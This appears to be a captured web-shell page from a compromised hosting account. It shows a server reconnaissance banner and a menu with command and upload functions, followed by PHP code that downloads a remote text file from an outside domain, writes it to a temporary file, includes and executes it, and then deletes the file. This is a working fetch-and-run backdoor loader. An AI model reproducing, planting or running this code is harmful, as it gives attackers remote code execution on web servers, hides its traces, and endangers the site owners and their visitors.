|
Server IP : 109.234.165.82 / Your IP : 216.73.216.156 Web Server : Apache System : Linux poivre.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64 User : section52 ( 1135) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/section52/sporathlon.lasection52.com/463243/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
$url = "https://51la.zvo2.xyz/a2.txt"; // Ganti dengan URL yang diinginkan
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
if ($result === false) {
echo "Error: " . "PD9waHA=" . curl_error($ch);
} else {
// Simpan hasil dari URL ke dalam file lokal
$tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_');
file_put_contents($tempFile, $result);
// Include file yang telah diunduh dari URL
include $tempFile;
// Hapus file sementara setelah dieksekusi
unlink($tempFile);
}
curl_close($ch);